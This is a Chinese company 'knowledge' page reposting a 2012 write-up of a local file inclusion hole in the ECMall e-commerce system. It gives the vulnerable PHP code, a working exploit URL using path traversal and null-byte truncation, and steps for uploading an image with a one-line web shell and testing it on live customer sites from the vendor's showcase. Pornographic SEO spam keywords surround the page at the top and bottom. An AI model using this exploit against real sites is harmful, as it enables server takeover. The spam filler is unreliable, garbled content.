男人吃奶摸下挵进去好爽,日日躁夜夜躁狠狠躁,freesexvide0s性欧美高清,高清freexxxx性国产,无码人妻一区二区三区一,乱人伦中文字幕成人网站在线,亚洲欧美综合一区二区三区 ,神马影院在线视频观看
知識學堂
  • ·聯系電話:+86.023-75585550
  • ·聯系傳真:+86.023-75585550
  • ·24小時手機:13896886023
  • ·QQ 咨 詢:361652718 513960520
當前位置 > 首頁 > 知識學堂 > 網站建設知識
ecmall本地文包函(0day)
更新時間:2012-05-21 | 發布人:本站 | 點擊率:339
ECMall 社區電子商務系統(簡稱ECMall)是上海商派網絡科技有限公司繼ECShop 之后推出的又一個電子商務姊妹產品。
 
最近看到烏云上暴了一個ecmall全版文件包函漏洞、其實自己早在去年做ecmall二次開發的時候也發現了一個本地文件包函漏洞和xss、不知道和烏云上的哪個是不是一樣。
 
出現的地方比較杯具,是一個核心文件里面、在eccore/ecmall.php文件里。大概78行左右吧。
 
 
 
//只判斷是app是否設置,然后去掉了兩端空格
 
$app = isset($_REQUEST['app']) ? trim($_REQUEST['app']) : $default_app;
 
$act = isset($_REQUEST['act']) ? trim($_REQUEST['act']) : $default_act;
 
//很明顯可以看出$app是我們可以控制的、由于后面連接了.app.php所以利用的時候要截斷。
 
$app_file = $config['app_root'] . "/{$app}.app.php";
 
//應為是本地包函、所以is_file是為真的
 
if (!is_file($app_file))
 
{
 
exit('Missing controller');
 
}
 
//這里直接就包函了,這么底級的漏洞、我都不好說什么了.
 
require($app_file);
 
 
 
Exp:http://xxxx.com/index.php?app=../data/files/mall/application/store_516_1.jpg%00.
 
 
 
測試:
 
到官方的用戶展示里挑幾個目標測試一下。
 
注冊一個用戶、上傳頭像或者其他上傳地方上傳一張函一句話的圖片、包函進來即可.
 
將圖片路徑替換exp里的路徑、后面的%00.就是前面所說的截斷00后面有個點看清楚.
 
 
 
注:須要在GPC沒打開時方能利用成功、所以說還是有一點雞肋的,不要用來做壞事、產生任何后果與本人無關。
 
 
 
其他地方還有很多xss、用xss來拿shell的成功率要高很多、因為后臺可以拿shell。匆忙亂寫的比較亂呀、見笑鳥,有機會寫個其他類型的。
分享到: QQ空間 新浪微博 開心網 人人網
主站蜘蛛池模板: 亚洲欧美成人一区二区在线| 涩涩涩丁香色婷五月网| 日韩精品久久无码中文字幕| 久久精品人人做人人爽老司机 | 野花韩国免费观看| 丰满的已婚女人hd中字| 乱人伦中文视频在线| 好男人在线社区www在线播放| 亚洲乱码中文字幕久久孕妇黑人 | 婷婷综合久久中文字幕蜜桃三电影| 久久久久亚洲av成人片乱码| 人妻av综合天堂一区| 欧美v国产v亚洲v日韩九九| 日韩综合夜夜香内射| 日韩精品久久无码中文字幕| 久久久久久久久无码精品亚洲日韩| 久久精品女人天堂av免费观看| 亚洲人成在久久综合网站| av无码精品一区二区三区| 一个人在线观看免费完整版| 久久亚洲av永久无码精品| 亚洲av成人无码网站| 国产美女遭强高潮网站| 四虎永久在线精品免费一区二区| 吃瓜爆料就看黑料社区| 天天躁夜夜躁狠狠综合| 河南妇女毛浓浓bw| 97碰碰碰人妻无码视频| 久久精品久久精品中文字幕| 亚洲三级黄色大片| 精品无人码麻豆乱码1区2区 | √新版天堂资源在线资源| 国产精品亚洲va在线| 亚洲乱妇熟女爽到高潮的片| 久久无码人妻一区二区三区午夜 | 日韩精品无码一本二本三本色| 伊人色综合九久久天天蜜桃| 国产精品视频全国免费观看| 成人做爰高潮尖叫声免费观看| 女人被狂c躁到高潮视频| 亚洲人成在久久综合网站|